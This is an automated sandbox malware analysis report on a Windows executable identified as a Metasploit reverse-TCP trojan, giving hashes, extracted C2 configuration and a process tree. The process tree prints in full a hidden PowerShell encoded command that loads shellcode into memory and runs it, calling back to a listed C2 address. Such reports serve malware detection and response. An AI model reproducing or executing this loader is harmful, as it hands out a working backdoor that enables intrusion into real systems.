metasploit | 6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517

General

Target

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe
Size

118KB
MD5

e656536f9ea974740acbe4a763b8a8fe
SHA1

ea8f2d6a56b330470c41602386fc350cfdce4278
SHA256

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517
SHA512

27d370402c843223c15f5b73e73e586e264460f432213b0ea6bc665306ab3e80c5a2851dc5ce48862bb3f8f3a1ea44d9254b7f7f5c081b60d4cf8b2472efe019
SSDEEP

1536:1jke9WIvVkcjVZx0A2gbwgObwf9PZWtv9oph/kSbIJwenruENm/3G4GhYo1dim:1Ie9WIv5RZHMiDour9m

Score

10^/10

metasploit backdoor execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.180.129:1111

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1956 powershell.exe
3048 powershell.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1956 powershell.exe
3048 powershell.exe
2584 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1956 powershell.exe
Token: SeDebugPrivilege 3048 powershell.exe
Token: SeDebugPrivilege 2584 powershell.exe

pid	process
1956	powershell.exe
3048	powershell.exe

pid	process
1956	powershell.exe
3048	powershell.exe
2584	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	process	target process
PID 2392 wrote to memory of 1956	2392	6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe	powershell.exe
PID 2392 wrote to memory of 1956	2392	6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe	powershell.exe
PID 2392 wrote to memory of 1956	2392	6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe	powershell.exe
PID 1956 wrote to memory of 3048	1956	powershell.exe	powershell.exe
PID 1956 wrote to memory of 3048	1956	powershell.exe	powershell.exe
PID 1956 wrote to memory of 3048	1956	powershell.exe	powershell.exe
PID 3048 wrote to memory of 2584	3048	powershell.exe	powershell.exe
PID 3048 wrote to memory of 2584	3048	powershell.exe	powershell.exe
PID 3048 wrote to memory of 2584	3048	powershell.exe	powershell.exe
PID 3048 wrote to memory of 2584	3048	powershell.exe	powershell.exe
PID 2584 wrote to memory of 2592	2584	powershell.exe	csc.exe
PID 2584 wrote to memory of 2592	2584	powershell.exe	csc.exe
PID 2584 wrote to memory of 2592	2584	powershell.exe	csc.exe
PID 2584 wrote to memory of 2592	2584	powershell.exe	csc.exe
PID 2592 wrote to memory of 2672	2592	csc.exe	cvtres.exe
PID 2592 wrote to memory of 2672	2592	csc.exe	cvtres.exe
PID 2592 wrote to memory of 2672	2592	csc.exe	cvtres.exe
PID 2592 wrote to memory of 2672	2592	csc.exe	cvtres.exe

C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe
"C:\Users\Admin\AppData\Local\Temp\6717c8b65513d5ff550d6346c06c33eff732de8543f79bd25ab583f38033f517.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -window hidden -EncodedCommand JABBADIAVgAgAD0AIAAnACQAUAB5AHgAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AHgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADEAOQAsADAAeABhAGIALAAwAHgAYQA4ACwAMAB4AGEAYwAsADAAeABkADkALAAwAHgAZQBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABmADMALAAwAHgANQA3ACwAMAB4ADQAYQAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAYQAyACwAMAB4AGYAZgAsADAAeAA5ADAALAAwAHgANwBiACwAMAB4ADkAMgAsADAAeAAyAGQALAAwAHgAZgA0ACwAMAB4AGYAMAAsADAAeAA4ADYALAAwAHgAZQAxACwAMAB4ADcAYwAsADAAeABlADMALAAwAHgAYQBjACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4AGUAMAAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAANQAsADAAeAAyAGQALAAwAHgANQA2ACwAMAB4AGUAOQAsADAAeABlADUALAAwAHgAOQBhACwAMAB4AGQAMgAsADAAeAAzADMALAAwAHgAYwBiACwAMAB4ADIANAAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADQAYQAsADAAeABkADkALAAwAHgAOABjACwAMAB4ADUANAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeABhADkALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYwA3ACwAMAB4ADQAMgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjAGYALAAwAHgAZQBjACwAMAB4ADcANAAsADAAeABmADAALAAwAHgAZAAzACwAMAB4ADAAZAAsADAAeAA1AGEALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAYwBhACwAMAB4AGQAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADUAOQAsADAAeABhADgALAAwAHgAMAA5ACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAMAA4ACwAMAB4ADIAYgAsADAAeAA2AGUALAAwAHgAMwAzACwAMAB4ADgAMQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADAAZAAsADAAeABlAGUALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeAA1ADkALAAwAHgAOQBiACwAMAB4AGUAYgAsADAAeAA4ADEALAAwAHgAOQAzACwAMAB4ADUAYgAsADAAeAAyAGEALAAwAHgAZQAyACwAMAB4AGQAOQAsADAAeABmADcALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4AGQAYQAsADAAeAAzADAALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeABkAGMALAAwAHgAOAAyACwAMAB4ADYAMwAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADEANQAsADAAeABjADMALAAwAHgAMAAzACwAMAB4AGMAYQAsADAAeABmADEALAAwAHgAZgA1ACwAMAB4AGMAMAAsADAAeAA4AGQALAAwAHgANwAyACwAMAB4AGYAOQAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGQAZAAsADAAeAAxAGUALAAwAHgAMwAwACwAMAB4ADAAZQAsADAAeAA1ADYALAAwAHgAMQBhACwAMAB4AGIAOQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADEAZAAsADAAeABmADYALAAwAHgANQBhACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgANQAyACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADMAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEAMwAsADAAeABhADkALAAwAHgAZQA1ACwAMAB4ADEAMQAsADAAeABkAGMALAAwAHgAMwAxACwAMAB4ADAAYQAsADAAeAA0AGMALAAwAHgANABiACwAMAB4AGYAZAAsADAAeABjADYALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeAA2ADkALAAwAHgANQAxACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAMwA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgAZgAxACwAMAB4AGIAZgAsADAAeABkADcALAAwAHgANABjACwAMAB4ADgAMwAsADAAeABhADgALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAAyAGIALAAwAHgAYgA4ACwAMAB4ADEANwAsADAAeAAyADQALAAwAHgANABjACwAMAB4ADkAMAAsADAAeABkADMALAAwAHgANwAwACwAMAB4ADEAYwAsADAAeAA4AGEALAAwAHgAZgAyACwAMAB4AGYAOAAsADAAeABmADcALAAwAHgANABhACwAMAB4AGYAYgAsADAAeAAyAGMALAAwAHgANgBkACwAMAB4ADQAMQAsADAAeAA2AGIALAAwAHgAMABmACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeAAxADkALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAOQA0ACwAMAB4AGUAYwAsADAAeABhADAALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABhADAALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABiADcALAAwAHgAMQAwACwAMAB4AGUAOAAsADAAeAAwADUALAAwAHgAMwA4ACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgAMgA2ACwAMAB4ADkAMgAsADAAeABlADcALAAwAHgAYQAyACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA3ADMALAAwAHgAZAA2ACwAMAB4ADIAYgAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAMwBiACwAMAB4AGYANgAsADAAeABlADMALAAwAHgAYQA2ACwAMAB4AGYANQAsADAAeABmAGYALAAwAHgAOABlACwAMAB4AGIANAAsADAAeAA2ADEALAAwAHgAZgAwACwAMAB4AGMANAAsADAAeABlADcALAAwAHgAMgA3ACwAMAB4ADAAZgAsADAAeABmADMALAAwAHgAOAAyACwAMAB4AGMANwAsADAAeAA4ADUALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeAA5ADAALAAwAHgAMwAxACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAZAA2ACwAMAB4ADkAZAAsADAAeABmAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeAAxADcALAAwAHgANgA5ACwAMAB4ADEAOAAsADAAeAAxADkALAAwAHgANQA4ACwAMAB4ADcAZAAsADAAeAA5ADgALAAwAHgAZAA5ACwAMAB4ADAAZQAsADAAeAAxADcALAAwAHgAOQA4ACwAMAB4AGIAMQAsADAAeABmADYALAAwAHgANAAzACwAMAB4AGMAYgAsADAAeABhADQALAAwAHgAZgA4ACwAMAB4ADUAOQAsADAAeAA3AGYALAAwAHgANwA1ACwAMAB4ADYAZAAsADAAeAA2ADIALAAwAHgAZAA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAMABhACwAMAB4AGQANAAsADAAeAAxADUALAAwAHgAMAAwACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANwAwACwAMAB4ADkAMAAsADAAeABlADkALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABlADYALAAwAHgAMAAzACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZABPAEgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGQATwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABkAE8ASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEAMgBWACkAKQA7ACQASQA5AE0AOQAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdABjAFUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB0AGMAVQAgACQASQA5AE0AOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABJADkATQA5ACAAJABlACIAOwB9AA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABBADIAVgAgAD0AIAAnACQAUAB5AHgAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUAB5AHgAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADEAOQAsADAAeABhAGIALAAwAHgAYQA4ACwAMAB4AGEAYwAsADAAeABkADkALAAwAHgAZQBlACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABiACwAMAB4ADMAMQAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADAAMwAsADAAeAA3ADIALAAwAHgAMQAyACwAMAB4ADgAMwAsADAAeABmADMALAAwAHgANQA3ACwAMAB4ADQAYQAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAYQAyACwAMAB4AGYAZgAsADAAeAA5ADAALAAwAHgANwBiACwAMAB4ADkAMgAsADAAeAAyAGQALAAwAHgAZgA0ACwAMAB4AGYAMAAsADAAeAA4ADYALAAwAHgAZQAxACwAMAB4ADcAYwAsADAAeABlADMALAAwAHgAYQBjACwAMAB4ADUAMwAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4AGUAMAAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAANQAsADAAeAAyAGQALAAwAHgANQA2ACwAMAB4AGUAOQAsADAAeABlADUALAAwAHgAOQBhACwAMAB4AGQAMgAsADAAeAAzADMALAAwAHgAYwBiACwAMAB4ADIANAAsADAAeAA0AGUALAAwAHgAMAA3ACwAMAB4ADQAYQAsADAAeABkADkALAAwAHgAOABjACwAMAB4ADUANAAsADAAeABhAGMALAAwAHgAZQAwACwAMAB4ADUAZgAsADAAeABhADkALAAwAHgAYQBkACwAMAB4ADIANQAsADAAeAAxADYALAAwAHgAYwA3ACwAMAB4ADQAMgAsADAAeABmAGIALAAwAHgAZgBmACwAMAB4AGEAYwAsADAAeABjAGYALAAwAHgAZQBjACwAMAB4ADcANAAsADAAeABmADAALAAwAHgAZAAzACwAMAB4ADAAZAAsADAAeAA1AGEALAAwAHgANwBlACwAMAB4ADYAYgAsADAAeAA3ADYALAAwAHgAZABmACwAMAB4ADQAMQAsADAAeAAxADgALAAwAHgAYwBhACwAMAB4AGQAZQAsADAAeAA5ADEALAAwAHgAYgAxACwAMAB4ADUAOQAsADAAeABhADgALAAwAHgAMAA5ACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAMAA4ACwAMAB4ADIAYgAsADAAeAA2AGUALAAwAHgAMwAzACwAMAB4ADgAMQAsADAAeAA1AGYALAAwAHgAYQBjACwAMAB4ADAAZAAsADAAeABlAGUALAAwAHgAZQA5ACwAMAB4ADQANwAsADAAeAA1ADkALAAwAHgAOQBiACwAMAB4AGUAYgAsADAAeAA4ADEALAAwAHgAOQAzACwAMAB4ADUAYgAsADAAeAAyAGEALAAwAHgAZQAyACwAMAB4AGQAOQAsADAAeABmADcALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAZQA3ACwAMAB4AGQAYQAsADAAeAAzADAALAAwAHgAMQA5ACwAMAB4ADkAYQAsADAAeABkAGMALAAwAHgAOAAyACwAMAB4ADYAMwAsADAAeAA0ADAALAAwAHgANgA4ACwAMAB4ADEANQAsADAAeABjADMALAAwAHgAMAAzACwAMAB4AGMAYQAsADAAeABmADEALAAwAHgAZgA1ACwAMAB4AGMAMAAsADAAeAA4AGQALAAwAHgANwAyACwAMAB4AGYAOQAsADAAeABhAGQALAAwAHgAZABhACwAMAB4AGQAZAAsADAAeAAxAGUALAAwAHgAMwAwACwAMAB4ADAAZQAsADAAeAA1ADYALAAwAHgAMQBhACwAMAB4AGIAOQAsADAAeABiADEALAAwAHgAYgA5ACwAMAB4AGEAYQAsADAAeABmADkALAAwAHgAOQA1ACwAMAB4ADEAZAAsADAAeABmADYALAAwAHgANQBhACwAMAB4AGIANwAsADAAeAAwADQALAAwAHgANQAyACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgANQA3ACwAMAB4ADMAYQAsADAAeABmADIALAAwAHgANgBjACwAMAB4ADEAMwAsADAAeABhADkALAAwAHgAZQA1ACwAMAB4ADEAMQAsADAAeABkAGMALAAwAHgAMwAxACwAMAB4ADAAYQAsADAAeAA0AGMALAAwAHgANABiACwAMAB4AGYAZAAsADAAeABjADYALAAwAHgANgBmACwAMAB4ADgAYgAsADAAeAA2ADkALAAwAHgANQAxACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAMwA2ACwAMAB4AGMAOQAsADAAeAA4AGIALAAwAHgAZgAxACwAMAB4AGIAZgAsADAAeABkADcALAAwAHgANABjACwAMAB4ADgAMwAsADAAeABhADgALAAwAHgAZQA4ACwAMAB4ADgAMwAsADAAeAAyAGIALAAwAHgAYgA4ACwAMAB4ADEANwAsADAAeAAyADQALAAwAHgANABjACwAMAB4ADkAMAAsADAAeABkADMALAAwAHgANwAwACwAMAB4ADEAYwAsADAAeAA4AGEALAAwAHgAZgAyACwAMAB4AGYAOAAsADAAeABmADcALAAwAHgANABhACwAMAB4AGYAYgAsADAAeAAyAGMALAAwAHgANgBkACwAMAB4ADQAMQAsADAAeAA2AGIALAAwAHgAMABmACwAMAB4AGQAYQAsADAAeABlADEALAAwAHgAZQBhACwAMAB4AGUANwAsADAAeAAxADkALAAwAHgAMABhACwAMAB4AGUAOAAsADAAeABhADAALAAwAHgAOQA0ACwAMAB4AGUAYwAsADAAeABhADAALAAwAHgAMQBlACwAMAB4AGYANwAsADAAeABhADAALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeABiADcALAAwAHgAMQAwACwAMAB4AGUAOAAsADAAeAAwADUALAAwAHgAMwA4ACwAMAB4ADQAZQAsADAAeAAwADgALAAwAHgAMgA2ACwAMAB4ADkAMgAsADAAeABlADcALAAwAHgAYQAyACwAMAB4AGMAOQAsADAAeAA0AGIALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA3ADMALAAwAHgAZAA2ACwAMAB4ADIAYgAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA1ADEALAAwAHgAMwBiACwAMAB4AGYANgAsADAAeABlADMALAAwAHgAYQA2ACwAMAB4AGYANQAsADAAeABmAGYALAAwAHgAOABlACwAMAB4AGIANAAsADAAeAA2ADEALAAwAHgAZgAwACwAMAB4AGMANAAsADAAeABlADcALAAwAHgAMgA3ACwAMAB4ADAAZgAsADAAeABmADMALAAwAHgAOAAyACwAMAB4AGMANwAsADAAeAA4ADUALAAwAHgAZgA4ACwAMAB4ADAANAAsADAAeAA5ADAALAAwAHgAMwAxACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAZAA2ACwAMAB4ADkAZAAsADAAeABmAGMALAAwAHgANQA3ACwAMAB4ADYAZAAsADAAeAAxADcALAAwAHgANgA5ACwAMAB4ADEAOAAsADAAeAAxADkALAAwAHgANQA4ACwAMAB4ADcAZAAsADAAeAA5ADgALAAwAHgAZAA5ACwAMAB4ADAAZQAsADAAeAAxADcALAAwAHgAOQA4ACwAMAB4AGIAMQAsADAAeABmADYALAAwAHgANAAzACwAMAB4AGMAYgAsADAAeABhADQALAAwAHgAZgA4ACwAMAB4ADUAOQAsADAAeAA3AGYALAAwAHgANwA1ACwAMAB4ADYAZAAsADAAeAA2ADIALAAwAHgAZAA2ACwAMAB4ADIAYQAsADAAeAAyADYALAAwAHgAMABhACwAMAB4AGQANAAsADAAeAAxADUALAAwAHgAMAAwACwAMAB4ADkANQAsADAAeAAyADcALAAwAHgANwAwACwAMAB4ADkAMAAsADAAeABlADkALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABlADYALAAwAHgAMAAzACwAMAB4AGMAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAZABPAEgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGQATwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABkAE8ASAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEAMgBWACkAKQA7ACQASQA5AE0AOQAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdABjAFUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMA